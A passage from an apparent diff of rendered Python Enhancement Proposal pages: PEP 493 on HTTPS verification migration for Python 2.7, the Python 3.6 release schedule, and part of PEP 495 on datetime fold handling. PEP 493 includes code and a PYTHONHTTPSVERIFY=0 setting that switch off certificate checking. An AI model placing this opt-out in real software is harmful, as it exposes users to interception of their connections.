PEP 493 – HTTPS verification migration tools for Python 2.7

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Robert Kuska <rkuska at redhat.com>, +Marc-André Lemburg <mal at lemburg.com>
+
BDFL-Delegate:
+
Barry Warsaw
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-May-2015
+
Python-Version:
+
2.7.12
+
Post-History:
+
06-Jul-2015, 11-Nov-2015, 24-Nov-2015, 24-Feb-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 476 updated Python’s default handling of HTTPS certificates in client +modules to align with certificate handling in web browsers, by validating +that the certificates received belonged to the server the client was attempting +to contact. The Python 2.7 long term maintenance series was judged to be in +scope for this change, with the new behaviour introduced in the Python 2.7.9 +maintenance release.

+

This has created a non-trivial barrier to adoption for affected Python 2.7 +maintenance releases, so this PEP proposes additional Python 2.7 specific +features that allow system administrators and other users to more easily +decouple the decision to verify server certificates in HTTPS client modules +from the decision to update to newer Python 2.7 maintenance releases.

+
+
+

Rationale

+

PEP 476 changed Python’s default behaviour to align with expectations +established by web browsers in regards to the semantics of HTTPS URLs: +starting with Python 2.7.9 and 3.4.3, HTTPS clients in the standard library +validate server certificates by default.

+

However, it is also the case that this change does cause problems for +infrastructure administrators operating private intranets that rely on +self-signed certificates, or otherwise encounter problems with the new default +certificate verification settings.

+

To manage these kinds of situations, web browsers provide users with “click +through” warnings that allow the user to add the server’s certificate to the +browser’s certificate store. Network client tools like curl and wget +offer options to switch off certificate checking entirely (by way of +curl --insecure and wget --no-check-certificate, respectively).

+

At a different layer of the technology stack, Linux security modules like +SELinux and AppArmor, while enabled by default by distribution vendors, +offer relatively straightforward mechanisms for turning them off.

+

At the moment, no such convenient mechanisms exist to disable Python’s +default certificate checking for a whole process.

+

PEP 476 did attempt to address this question, by covering how to revert to the +old settings process wide by monkeypatching the ssl module to restore the +old behaviour. Unfortunately, the sitecustomize.py based technique proposed +to allow system administrators to disable the feature by default in their +Standard Operating Environment definition has been determined to be +insufficient in at least some cases. The specific case that led to the +initial creation of this PEP is the one where a Linux distributor aims to +provide their users with a +smoother migration path +than the standard one provided by consuming upstream CPython 2.7 releases +directly, but other potential challenges have also been pointed out with +updating embedded Python runtimes and other user level installations of Python.

+

Rather than allowing a plethora of mutually incompatible migration techniques +to bloom, this PEP proposes an additional feature to be added to Python 2.7.12 +to make it easier to revert a process to the past behaviour of skipping +certificate validation in HTTPS client modules. It also provides additional +recommendations to redistributors backporting these features to versions of +Python prior to Python 2.7.9.

+
+

Alternatives

+

In the absence of clear upstream guidance and recommendations, commercial +redistributors will still make their own design decisions in the interests of +their customers. The main approaches available are:

+
    +
  • Continuing to rebase on new Python 2.7.x releases, while providing no +additional assistance beyond the mechanisms defined in PEP 476 in migrating +from unchecked to checked hostnames in standard library HTTPS clients
  • +
  • Gating availability of the changes in default handling of HTTPS connections +on upgrading from Python 2 to Python 3
  • +
  • For Linux distribution vendors, gating availability of the changes in default +handling of HTTPS connections on upgrading to a new operating system version
  • +
  • Implementing one or both of the backport suggestions described in this PEP, +regardless of the formal status of the PEP
  • +
+
+
+
+

Scope Limitations

+

These changes are being proposed purely as tools for helping to manage the +transition to the new default certificate handling behaviour in the context +of Python 2.7. They are not being proposed as new features for Python 3, as +it is expected that the vast majority of client applications affected by this +problem without the ability to update the application itself will be Python 2 +applications.

+

It would likely be desirable for a future version of Python 3 to allow the +default certificate handling for secure protocols to be configurable on a +per-protocol basis, but that question is beyond the scope of this PEP.

+
+
+

Requirements for capability detection

+

As the proposals in this PEP aim to facilitate backports to earlier Python +versions, the Python version number cannot be used as a reliable means for +detecting them. Instead, they are designed to allow the presence +or absence of the feature to be determined using the following technique:

+
python -c "import ssl; ssl.<_relevant_attribute>"
+
+
+

This will fail with AttributeError (and hence a non-zero return code) if +the relevant capability is not available.

+

The feature detection attributes defined by this PEP are:

+
    +
  • ssl._https_verify_certificates: runtime configuration API
  • +
  • ssl._https_verify_envvar: environment based configuration
  • +
  • ssl._cert_verification_config: file based configuration (PEP 476 opt-in)
  • +
+

The marker attributes are prefixed with an underscore to indicate the +implementation dependent and security sensitive nature of these capabilities.

+
+
+

Feature: Configuration API

+

This change is proposed for inclusion in CPython 2.7.12 and later CPython 2.7.x releases. It consists of a new ssl._https_verify_certificates() function to specify the default handling of HTTPS certificates in standard library client libraries.

+

It is not proposed to forward port this change to Python 3, so Python 3 +applications that need to support skipping certificate verification will still +need to define their own suitable security context.

+
+

Feature detection

+

The marker attribute on the ssl module related to this feature is the +ssl._https_verify_certificates function itself.

+
+
+

Specification

+

The ssl._https_verify_certificates function will work as follows:

+
def _https_verify_certificates(enable=True):
+    """Verify server HTTPS certificates by default?"""
+    global _create_default_https_context
+    if enable:
+        _create_default_https_context = create_default_context
+    else:
+        _create_default_https_context = _create_unverified_context
+
+
+

If called without arguments, or with enable set to a true value, then standard library client modules will subsequently verify HTTPS certificates by default.

+

If called with enable set to a false value, then standard library client +modules will subsequently skip verifying HTTPS certificates by default.

+
+
+

Security Considerations

+

The inclusion of this feature will allow security sensitive applications to +include the following forward-compatible snippet in their code:

+
if hasattr(ssl, "_https_verify_certificates"):
+    ssl._https_verify_certificates()
+
+
+

Some developers may also choose to opt out of certificate checking using +ssl._https_verify_certificates(enable=False). This doesn’t introduce any +major new security concerns, as monkeypatching the affected internal APIs was +already possible.

+
+
+
+

Feature: environment based configuration

+

This change is proposed for inclusion in CPython 2.7.12 and later CPython 2.7.x releases. It consists of a new PYTHONHTTPSVERIFY environment variable that can be set to '0' to disable the default verification without modifying the application source code (which may not even be available in cases of bytecode-only application distribution).

+

It is not proposed to forward port this change to Python 3, so Python 3 +applications that need to support skipping certificate verification will still +need to define their own suitable security context.

+
+

Feature detection

+

The marker attribute on the ssl module related to this feature is:

+
    +
  • the ssl._https_verify_envvar attribute, giving the name of environment +variable affecting the default behaviour
  • +
+

This not only makes it straightforward to detect the presence (or absence) of +the capability, it also makes it possible to programmatically determine the +relevant environment variable name.
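A sketch of such a programmatic check (the fallback message is illustrative):

import os
import ssl

envvar = getattr(ssl, "_https_verify_envvar", None)
if envvar is None:
    print("environment based configuration not supported")
else:
    print("%s=%s" % (envvar, os.environ.get(envvar, "<unset>")))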

+
+
+

Specification

+

Rather than always defaulting to the use of ssl.create_default_context, +the ssl module will be modified to:

+
    +
  • read the PYTHONHTTPSVERIFY environment variable when the module is first +imported into a Python process
  • +
  • set the ssl._create_default_https_context function to be an alias for +ssl._create_unverified_context if this environment variable is present +and set to '0'
  • +
  • otherwise, set the ssl._create_default_https_context function to be an +alias for ssl.create_default_context as usual
  • +
+
+
+

Example implementation

+
_https_verify_envvar = 'PYTHONHTTPSVERIFY'
+
+def _get_https_context_factory():
+    if not sys.flags.ignore_environment:
+        config_setting = os.environ.get(_https_verify_envvar)
+        if config_setting == '0':
+            return _create_unverified_context
+    return create_default_context
+
+_create_default_https_context = _get_https_context_factory()
+
+
+
+
+

Security Considerations

+

Relative to the behaviour in Python 3.4.3+ and Python 2.7.9->2.7.11, this +approach does introduce a new downgrade attack against the default security +settings that potentially allows a sufficiently determined attacker to revert +Python to the default behaviour used in CPython 2.7.8 and earlier releases.

+

This slight increase in the available attack surface is a key reason why:

+
    +
  • security sensitive applications should still define their own SSL context
  • +
  • the migration features described in this PEP are not being added to Python 3
  • +
+

However, it’s also worth keeping in mind that carrying out such an attack +requires the ability to modify the execution environment of a Python process +prior to the import of the ssl module. In combination with the ability +to write to any part of the filesystem (such as /tmp), any attacker with +such access would already be able to modify the behaviour of the underlying +OpenSSL implementation, the dynamic library loader, and other potentially +security sensitive components.

+
+
+

Interaction with Python virtual environments

+

The default setting is read directly from the process environment, and hence +works the same way regardless of whether or not the interpreter is being run +inside an activated Python virtual environment.

+
+
+
+

Reference Implementation

+

A patch for Python 2.7 implementing the above two features is attached to +the relevant tracker issue.

+
+
+

Backporting this PEP to earlier Python versions

+

If this PEP is accepted, then commercial Python redistributors may choose to +backport the per-process configuration mechanisms defined in this PEP to base +versions older than Python 2.7.9, without also backporting PEP 476’s change +to the default behaviour of the overall Python installation.

+

Such a backport would differ from the mechanism proposed in this PEP solely in +the default behaviour when PYTHONHTTPSVERIFY was not set at all: it would +continue to default to skipping certificate validation.

+

In this case, if the PYTHONHTTPSVERIFY environment variable is defined, and +set to anything other than '0', then HTTPS certificate verification +should be enabled.

+
+

Feature detection

+

There’s no specific attribute indicating that this situation applies. Rather, +it is indicated by the ssl._https_verify_certificates and +ssl._https_verify_envvar attributes being present in a Python version that +is nominally older than Python 2.7.12.

+
+
+

Specification

+

Implementing this backport involves backporting the changes in PEP 466, 476 and +this PEP, with the following change to the handling of the +PYTHONHTTPSVERIFY environment variable in the ssl module:

+
    +
  • read the PYTHONHTTPSVERIFY environment variable when the module is first +imported into a Python process
  • +
  • set the ssl._create_default_https_context function to be an alias for +ssl.create_default_context if this environment variable is present +and set to any value other than '0'
  • +
  • otherwise, set the ssl._create_default_https_context function to be an +alias for ssl._create_unverified_context
  • +
+
+
+

Example implementation

+
_https_verify_envvar = 'PYTHONHTTPSVERIFY'
+
+def _get_https_context_factory():
+    if not sys.flags.ignore_environment:
+        config_setting = os.environ.get(_https_verify_envvar)
+        if config_setting != '0':
+            return create_default_context
+    return _create_unverified_context
+
+_create_default_https_context = _get_https_context_factory()
+
+def _disable_https_default_verification():
+    """Skip verification of HTTPS certificates by default"""
+    global _create_default_https_context
+    _create_default_https_context = _create_unverified_context
+
+
+
+
+

Security Considerations

+

This change would be a strict security upgrade for any Python version that +currently defaults to skipping certificate validation in standard library +HTTPS clients. The technical trade-offs to be taken into account relate largely +to the magnitude of the PEP 466 backport also required rather than to anything +security related.

+
+
+

Interaction with Python virtual environments

+

The default setting is read directly from the process environment, and hence +works the same way regardless of whether or not the interpreter is being run +inside an activated Python virtual environment.

+
+
+
+

Backporting PEP 476 to earlier Python versions

+

The backporting approach described above leaves the default HTTPS certificate +verification behaviour of a Python 2.7 installation unmodified: verifying +certificates still needs to be opted into on a per-connection or per-process +basis.

+

To allow the default behaviour of the entire installation to be modified +without breaking backwards compatibility, Red Hat designed a configuration +mechanism for the system Python 2.7 installation in Red Hat Enterprise Linux +7.2+ that provides:

+
    +
  • an opt-in model that allows the decision to enable HTTPS certificate +verification to be made independently of the decision to upgrade to the +operating system version where the feature was first backported
  • +
  • the ability for system administrators to set the default behaviour of Python +applications and scripts run directly in the system Python installation
  • +
  • the ability for the redistributor to consider changing the default behaviour +of new installations at some point in the future without impacting existing +installations that have been explicitly configured to skip verifying HTTPS +certificates by default
  • +
+

As it only affects backports to earlier releases of Python 2.7, this change is +not proposed for inclusion in upstream CPython, but rather is offered as +a recommendation to other redistributors that choose to offer a similar feature +to their users.

+

This PEP doesn’t take a position on whether or not this particular change is a +good idea - rather, it suggests that if a redistributor chooses to go down +the path of making the default behaviour configurable in a version of Python +older than Python 2.7.9, then maintaining a consistent approach across +redistributors would be beneficial for users.

+

However, this approach SHOULD NOT be used for any Python installation that +advertises itself as providing Python 2.7.9 or later, as most Python users +will have the reasonable expectation that all such environments will verify +HTTPS certificates by default.

+
+

Feature detection

+

The marker attribute on the ssl module related to this feature is:

+
_cert_verification_config = '<path to configuration file>'
+
+
+

This not only makes it straightforward to detect the presence (or absence) of +the capability, it also makes it possible to programmatically determine the +relevant configuration file name.
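Based on the reading code in the example implementation below, the file itself is a simple ConfigParser-style file; a representative /etc/python/cert-verification.cfg could look like this (the recognized verify values being enable, disable and platform_default):

[https]
verify=platform_default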

+
+ + + +
+

Example implementation

+
_cert_verification_config = '/etc/python/cert-verification.cfg'
+
+def _get_https_context_factory():
+    # Check for a system-wide override of the default behaviour
+    context_factories = {
+        'enable': create_default_context,
+        'disable': _create_unverified_context,
+        'platform_default': _create_unverified_context, # For now :)
+    }
+    import ConfigParser
+    config = ConfigParser.RawConfigParser()
+    config.read(_cert_verification_config)
+    try:
+        verify_mode = config.get('https', 'verify')
+    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
+        verify_mode = 'platform_default'
+    default_factory = context_factories.get('platform_default')
+    return context_factories.get(verify_mode, default_factory)
+
+_create_default_https_context = _get_https_context_factory()
+
+
+
+
+

Security Considerations

+

The specific recommendations for this backporting case are designed to work for +privileged, security sensitive processes, even those being run in the following +locked down configuration:

+
    +
  • run from a locked down administrator controlled directory rather than a normal +user directory (preventing sys.path[0] based privilege escalation attacks)
  • +
  • run using the -E switch (preventing PYTHON* environment variable based +privilege escalation attacks)
  • +
  • run using the -s switch (preventing user site directory based privilege +escalation attacks)
  • +
  • run using the -S switch (preventing sitecustomize based privilege +escalation attacks)
  • +
+

The intent is that the only reason HTTPS verification should be getting +turned off installation wide when using this approach is because:

+
    +
  • an end user is running a redistributor provided version of CPython rather +than running upstream CPython directly
  • +
  • that redistributor has decided to provide a smoother migration path to +verifying HTTPS certificates by default than that being provided by the +upstream project
  • +
  • either the redistributor or the local infrastructure administrator has +determined that it is appropriate to retain the default pre-2.7.9 behaviour +(at least for the time being)
  • +
+

Using an administrator controlled configuration file rather than an environment +variable has the essential feature of providing a smoother migration path, even +for applications being run with the -E switch.

+
+
+

Interaction with Python virtual environments

+

This setting is scoped by the interpreter installation and affects all Python +processes using that interpreter, regardless of whether or not the interpreter +is being run inside an activated Python virtual environment.

+
+
+

Origins of this recommendation

+

This recommendation is based on the backporting approach adopted for Red Hat +Enterprise Linux 7.2, as published in the original July 2015 draft of this PEP +and described in detail in this KnowledgeBase article. Red Hat’s patches implementing +this backport for Python 2.7.5 can be found in the CentOS git repository.

+
+
+
+

Recommendation for combined feature backports

+

If a redistributor chooses to backport the environment variable based +configuration setting from this PEP to a modified Python version that also +implements the configuration file based PEP 476 backport, then the environment +variable should take precedence over the system-wide configuration setting. +This allows the setting to be changed for a given user or application, +regardless of the installation-wide default behaviour.

+
+

Example implementation

+
_https_verify_envvar = 'PYTHONHTTPSVERIFY'
+_cert_verification_config = '/etc/python/cert-verification.cfg'
+
+def _get_https_context_factory():
+    # Check for an environmental override of the default behaviour
+    if not sys.flags.ignore_environment:
+        config_setting = os.environ.get(_https_verify_envvar)
+        if config_setting is not None:
+            if config_setting == '0':
+                return _create_unverified_context
+            return create_default_context
+
+    # Check for a system-wide override of the default behaviour
+    context_factories = {
+        'enable': create_default_context,
+        'disable': _create_unverified_context,
+        'platform_default': _create_unverified_context, # For now :)
+    }
+    import ConfigParser
+    config = ConfigParser.RawConfigParser()
+    config.read(_cert_verification_config)
+    try:
+        verify_mode = config.get('https', 'verify')
+    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
+        verify_mode = 'platform_default'
+    default_factory = context_factories.get('platform_default')
+    return context_factories.get(verify_mode, default_factory)
+
+_create_default_https_context = _get_https_context_factory()
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0493.rst

+


+ +
+ +
\ No newline at end of file
diff --git a/pep-0494/index.html b/pep-0494/index.html
new file mode 100644
index 00000000000..13430b1011c
--- /dev/null
+++ b/pep-0494/index.html
@@ -0,0 +1,353 @@

PEP 494 – Python 3.6 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 494 – Python 3.6 Release Schedule

+
+
Author:
+
Ned Deily <nad at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
30-May-2015
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.6. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.6 Release Manager: Ned Deily
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard, Georg Brandl
  • +
+
+
+

3.6 Lifespan

+

3.6 will receive bugfix updates +approximately every 3 months for about 24 months. Sometime after the release of +3.7.0 final, a final 3.6 bugfix update will be released. +After that, it is expected that +security updates +(source only) will be released as needed until 5 years after +the release of 3.6 final, so until approximately 2021-12.

+

As of 2021-12-23, 3.6 has reached the +end-of-life phase +of its release cycle. 3.6.15 was the final security release. The code base for +3.6 is now frozen and no further updates will be provided nor issues of any +kind will be accepted on the bug tracker.

+
+
+

Release Schedule

+
+

3.6.0 schedule

+
    +
  • 3.6 development begins: 2015-05-24
  • +
  • 3.6.0 alpha 1: 2016-05-17
  • +
  • 3.6.0 alpha 2: 2016-06-13
  • +
  • 3.6.0 alpha 3: 2016-07-11
  • +
  • 3.6.0 alpha 4: 2016-08-15
  • +
  • 3.6.0 beta 1: 2016-09-12 +(No new features beyond this point.)
  • +
  • 3.6.0 beta 2: 2016-10-10
  • +
  • 3.6.0 beta 3: 2016-10-31
  • +
  • 3.6.0 beta 4: 2016-11-21
  • +
  • 3.6.0 candidate 1: 2016-12-06
  • +
  • 3.6.0 candidate 2: 2016-12-16
  • +
  • 3.6.0 final: 2016-12-23
  • +
+
+
+

3.6.1 schedule (first bugfix release)

+
    +
  • 3.6.1 candidate: 2017-03-05
  • +
  • 3.6.1 final: 2017-03-21
  • +
+
+
+

3.6.2 schedule

+
    +
  • 3.6.2 candidate 1: 2017-06-17
  • +
  • 3.6.2 candidate 2: 2017-07-07
  • +
  • 3.6.2 final: 2017-07-17
  • +
+
+
+

3.6.3 schedule

+
    +
  • 3.6.3 candidate: 2017-09-19
  • +
  • 3.6.3 final: 2017-10-03
  • +
+
+
+

3.6.4 schedule

+
    +
  • 3.6.4 candidate: 2017-12-05
  • +
  • 3.6.4 final: 2017-12-19
  • +
+
+
+

3.6.5 schedule

+
    +
  • 3.6.5 candidate: 2018-03-13
  • +
  • 3.6.5 final: 2018-03-28
  • +
+
+
+

3.6.6 schedule

+
    +
  • 3.6.6 candidate: 2018-06-12
  • +
  • 3.6.6 final: 2018-06-27
  • +
+
+
+

3.6.7 schedule

+
    +
  • 3.6.7 candidate: 2018-09-26
  • +
  • 3.6.7 candidate 2: 2018-10-13
  • +
  • 3.6.7 final: 2018-10-20
  • +
+
+
+

3.6.8 schedule (last bugfix release)

+

Last binary releases

+
    +
  • 3.6.8 candidate: 2018-12-11
  • +
  • 3.6.8 final: 2018-12-24
  • +
+
+
+

3.6.9 schedule (first security-only release)

+

Source only

+
    +
  • 3.6.9 candidate 1: 2019-06-18
  • +
  • 3.6.9 final: 2019-07-02
  • +
+
+
+

3.6.10 schedule

+
    +
  • 3.6.10 candidate 1: 2019-12-11
  • +
  • 3.6.10 final: 2019-12-18
  • +
+
+
+

3.6.11 schedule

+
    +
  • 3.6.11 candidate 1: 2020-06-15
  • +
  • 3.6.11 final: 2020-06-27
  • +
+
+
+

3.6.12 schedule

+
    +
  • 3.6.12 final: 2020-08-17
  • +
+
+
+

3.6.13 schedule

+
    +
  • 3.6.13 final: 2021-02-15
  • +
+
+
+

3.6.14 schedule

+
    +
  • 3.6.14 final: 2021-06-28
  • +
+
+
+

3.6.15 schedule (last security-only release)

+
    +
  • 3.6.15 final: 2021-09-04
  • +
+
+
+
+

Features for 3.6

+

Implemented changes for 3.6 (as of 3.6.0 beta 1):

+
    +
  • PEP 468, Preserving Keyword Argument Order
  • +
  • PEP 487, Simpler customization of class creation
  • +
  • PEP 495, Local Time Disambiguation
  • +
  • PEP 498, Literal String Formatting
  • +
  • PEP 506, Adding A Secrets Module To The Standard Library
  • +
  • PEP 509, Add a private version to dict
  • +
  • PEP 515, Underscores in Numeric Literals
  • +
  • PEP 519, Adding a file system path protocol
  • +
  • PEP 520, Preserving Class Attribute Definition Order
  • +
  • PEP 523, Adding a frame evaluation API to CPython
  • +
  • PEP 524, Make os.urandom() blocking on Linux (during system startup)
  • +
  • PEP 525, Asynchronous Generators (provisional)
  • +
  • PEP 526, Syntax for Variable Annotations (provisional)
  • +
  • PEP 528, Change Windows console encoding to UTF-8 (provisional)
  • +
  • PEP 529, Change Windows filesystem encoding to UTF-8 (provisional)
  • +
  • PEP 530, Asynchronous Comprehensions
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0494.rst

+


+ +
+ +
\ No newline at end of file
diff --git a/pep-0495/index.html b/pep-0495/index.html
new file mode 100644
index 00000000000..d220e84a75d
--- /dev/null
+++ b/pep-0495/index.html
@@ -0,0 +1,1009 @@

PEP 495 – Local Time Disambiguation | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 495 – Local Time Disambiguation

+
+
Author:
+
Alexander Belopolsky <alexander.belopolsky at gmail.com>, Tim Peters <tim.peters at gmail.com>
+
Discussions-To:
+
Datetime-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Aug-2015
+
Python-Version:
+
3.6
+
Resolution:
+
Datetime-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new attribute fold to instances of the +datetime.time and datetime.datetime classes that can be used +to differentiate between two moments in time for which local times are +the same. The allowed values for the fold attribute will be 0 and 1 +with 0 corresponding to the earlier and 1 to the later of the two +possible readings of an ambiguous local time.

+
+
+

Rationale

+

In most world locations, there have been and will be times when +local clocks are moved back. [1] In those times, intervals are +introduced in which local clocks show the same time twice in the same +day. In these situations, the information displayed on a local clock +(or stored in a Python datetime instance) is insufficient to identify +a particular moment in time. The proposed solution is to add an +attribute to the datetime instances taking values of 0 and 1 that +will enumerate the two ambiguous times.

[Cartoon: a strong man struggles to stop the hands of a large clock; the caption reads: “You can’t stop time… but you can turn it back one hour at 2 a.m. Oct. 28 when daylight-saving time ends and standard time begins.”]
+
+

Terminology

+

When clocks are moved back, we say that a fold [2] is created in time. +When the clocks are moved forward, a gap is created. A local time +that falls in the fold is called ambiguous. A local time that falls +in the gap is called missing.

+ +
+
+

Proposal

+
+

The “fold” attribute

+

We propose adding an attribute called fold to instances of the +datetime.time and datetime.datetime classes. This attribute +should have the value 0 for all instances except those that represent +the second (chronologically) moment in time in an ambiguous case. For +those instances, the value will be 1. [3]

+ +
+
+

Affected APIs

+
+

Attributes

+

Instances of datetime.time and datetime.datetime classes will +get a new attribute fold with two possible values: 0 and 1.

+
+
+

Constructors

+

The __new__ methods of the datetime.time and +datetime.datetime classes will get a new keyword-only argument +called fold with the default value 0. The value of the +fold argument will be used to initialize the value of the +fold attribute in the returned instance.

+
+
+

Methods

+

The replace() methods of the datetime.time and +datetime.datetime classes will get a new keyword-only argument +called fold. It will behave similarly to the other replace() +arguments: if the fold argument is specified and given a value 0 +or 1, the new instance returned by replace() will have its +fold attribute set to that value. In CPython, any non-integer +value of fold will raise a TypeError, but other +implementations may allow the value None to behave the same as +when fold is not given. [4] (This is +a nod to the existing difference in treatment of None arguments +in other positions of this method across Python implementations; +it is not intended to leave the door open for future alternative +interpretation of fold=None.) If the fold argument is not +specified, the original value of the fold attribute is copied to +the result.

+ +
+
+

C-API

+

Access macros will be defined to extract the value of fold from +PyDateTime_DateTime and PyDateTime_Time objects.

+
int PyDateTime_DATE_GET_FOLD(PyDateTime_DateTime *o)
+
+
+

Return the value of fold as a C int.

+
int PyDateTime_TIME_GET_FOLD(PyDateTime_Time *o)
+
+
+

Return the value of fold as a C int.

+

New constructors will be defined that will take an additional +argument to specify the value of fold in the created +instance:

+
PyObject* PyDateTime_FromDateAndTimeAndFold(
+    int year, int month, int day, int hour, int minute,
+    int second, int usecond, int fold)
+
+
+

Return a datetime.datetime object with the specified year, month, +day, hour, minute, second, microsecond and fold.

+
PyObject* PyTime_FromTimeAndFold(
+    int hour, int minute, int second, int usecond, int fold)
+
+
+

Return a datetime.time object with the specified hour, minute, +second, microsecond and fold.

+
+
+
+

Affected Behaviors

+
+

What time is it?

+

The datetime.now() method called without arguments will set +fold=1 when returning the second of the two ambiguous times in a +system local time fold. When called with a tzinfo argument, the +value of the fold will be determined by the tzinfo.fromutc() +implementation. When an instance of the datetime.timezone class +(the stdlib’s fixed-offset tzinfo subclass, +e.g. datetime.timezone.utc) is passed as tzinfo, the +returned datetime instance will always have fold=0. +The datetime.utcnow() method is unaffected.

+
+
+

Conversion from naive to aware

+

A new feature is proposed to facilitate conversion from naive datetime +instances to aware.

+

The astimezone() method will now work for naive self. The +system local timezone will be assumed in this case and the fold +flag will be used to determine which local timezone is in effect +in the ambiguous case.

+

For example, on a system set to US/Eastern timezone:

+
>>> dt = datetime(2014, 11, 2, 1, 30)
+>>> dt.astimezone().strftime('%D %T %Z%z')
+'11/02/14 01:30:00 EDT-0400'
+>>> dt.replace(fold=1).astimezone().strftime('%D %T %Z%z')
+'11/02/14 01:30:00 EST-0500'
+
+
+

An implication is that datetime.now(tz) is fully equivalent to +datetime.now().astimezone(tz) (assuming tz is an instance of a +post-PEP tzinfo implementation, i.e. one that correctly handles +and sets fold).

+
+
+

Conversion from POSIX seconds from EPOCH

+

The fromtimestamp() static method of datetime.datetime will +set the fold attribute appropriately in the returned object.

+

For example, on a system set to US/Eastern timezone:

+
>>> datetime.fromtimestamp(1414906200)
+datetime.datetime(2014, 11, 2, 1, 30)
+>>> datetime.fromtimestamp(1414906200 + 3600)
+datetime.datetime(2014, 11, 2, 1, 30, fold=1)
+
+
+
+
+

Conversion to POSIX seconds from EPOCH

+

The timestamp() method of datetime.datetime will return different +values for datetime.datetime instances that differ only by the value +of their fold attribute if and only if these instances represent an +ambiguous or a missing time.

+

When a datetime.datetime instance dt represents an ambiguous +time, there are two values s0 and s1 such that:

+
datetime.fromtimestamp(s0) == datetime.fromtimestamp(s1) == dt
+
+
+

(This is because == disregards the value of fold – see below.)

+

In this case, dt.timestamp() will return the smaller of s0 +and s1 values if dt.fold == 0 and the larger otherwise.

+

For example, on a system set to US/Eastern timezone:

+
>>> datetime(2014, 11, 2, 1, 30, fold=0).timestamp()
+1414906200.0
+>>> datetime(2014, 11, 2, 1, 30, fold=1).timestamp()
+1414909800.0
+
+
+

When a datetime.datetime instance dt represents a missing +time, there is no value s for which:

+
datetime.fromtimestamp(s) == dt
+
+
+

but we can form two “nice to know” values of s that differ by the size of the gap in seconds. One is the value of s that would correspond to dt in a timezone where the UTC offset is always the same as the offset right before the gap, and the other is the similar value but in a timezone where the UTC offset is always the same as the offset right after the gap.

+

The value returned by dt.timestamp() given a missing +dt will be the greater of the two “nice to know” values +if dt.fold == 0 and the smaller otherwise. +(This is not a typo – it’s intentionally backwards from the rule for +ambiguous times.)

+

For example, on a system set to US/Eastern timezone:

+
>>> datetime(2015, 3, 8, 2, 30, fold=0).timestamp()
+1425799800.0
+>>> datetime(2015, 3, 8, 2, 30, fold=1).timestamp()
+1425796200.0
+
+
+
+
+

Aware datetime instances

+

Users of pre-PEP implementations of tzinfo will not see any +changes in the behavior of their aware datetime instances. Two such +instances that differ only by the value of the fold attribute will +not be distinguishable by any means other than an explicit access to +the fold value. (This is because these pre-PEP implementations +are not using the fold attribute.)

+

On the other hand, if an object’s tzinfo is set to a fold-aware +implementation, then in a fold or gap the value of fold will +affect the result of several methods: +utcoffset(), dst(), tzname(), astimezone(), +strftime() (if the “%Z” or “%z” directive is used in the format +specification), isoformat(), and timetuple().

+
+
+

Combining and splitting date and time

+

The datetime.datetime.combine() method will copy the value of the +fold attribute to the resulting datetime.datetime instance.

+

The datetime.datetime.time() method will copy the value of the +fold attribute to the resulting datetime.time instance.

+
+
+

Pickles

+

The value of the fold attribute will only be saved in pickles created +with protocol version 4 (introduced in Python 3.4) or greater.

+

Pickle sizes for the datetime.datetime and datetime.time +objects will not change. The fold value will be encoded in the +first bit of the 3rd byte of the datetime.datetime +pickle payload; and in the first bit of the 1st byte of the +datetime.time payload. In the current implementation +these bytes are used to store the month (1-12) and hour (0-23) values +and the first bit is always 0. We picked these bytes because they are +the only bytes that are checked by the current unpickle code. Thus +loading post-PEP fold=1 pickles in a pre-PEP Python will result in +an exception rather than an instance with out of range components.
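The effect can be demonstrated directly; a minimal round-trip check (protocol behavior per the paragraph above):

import pickle
from datetime import datetime

dt = datetime(2014, 11, 2, 1, 30, fold=1)
copy = pickle.loads(pickle.dumps(dt, protocol=4))
print(copy.fold)  # 1: protocol 4 preserves the fold bit
# With protocol <= 3 the fold value is not stored and reads back as 0.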

+
+
+
+
+

Implementations of tzinfo in the Standard Library

+

No new implementations of datetime.tzinfo abstract class are +proposed in this PEP. The existing (fixed offset) timezones do +not introduce ambiguous local times and their utcoffset() +implementation will return the same constant value as they do now +regardless of the value of fold.

+

The basic implementation of fromutc() in the abstract +datetime.tzinfo class will not change. It is currently not used +anywhere in the stdlib because the only included tzinfo +implementation (the datetime.timezone class implementing fixed +offset timezones) overrides fromutc(). Keeping the default +implementation unchanged has the benefit that pre-PEP 3rd party +implementations that inherit the default fromutc() are not +accidentally affected.

+
+
+

Guidelines for New tzinfo Implementations

+

Implementors of concrete datetime.tzinfo subclasses who want to +support variable UTC offsets (due to DST and other causes) should follow +these guidelines.

+
+

Ignorance is Bliss

+

New implementations of utcoffset(), tzname() and dst() +methods should ignore the value of fold unless they are called on +the ambiguous or missing times.

+
+
+

In the Fold

+

New subclasses should override the base-class fromutc() method and implement it so that in all cases where two different UTC times u0 and u1 (u0 < u1) correspond to the same local time t, fromutc(u0) will return an instance with fold=0 and fromutc(u1) will return an instance with fold=1. In all other cases the returned instance should have fold=0.

+

The utcoffset(), tzname() and dst() methods should use the +value of the fold attribute to determine whether an otherwise +ambiguous time t corresponds to the time before or after the +transition. By definition, utcoffset() is greater before and +smaller after any transition that creates a fold. The values returned +by tzname() and dst() may or may not depend on the value of +the fold attribute depending on the kind of the transition.

+Diagram of relationship between UTC and local time around a fall-back transition – see full description on page. + +

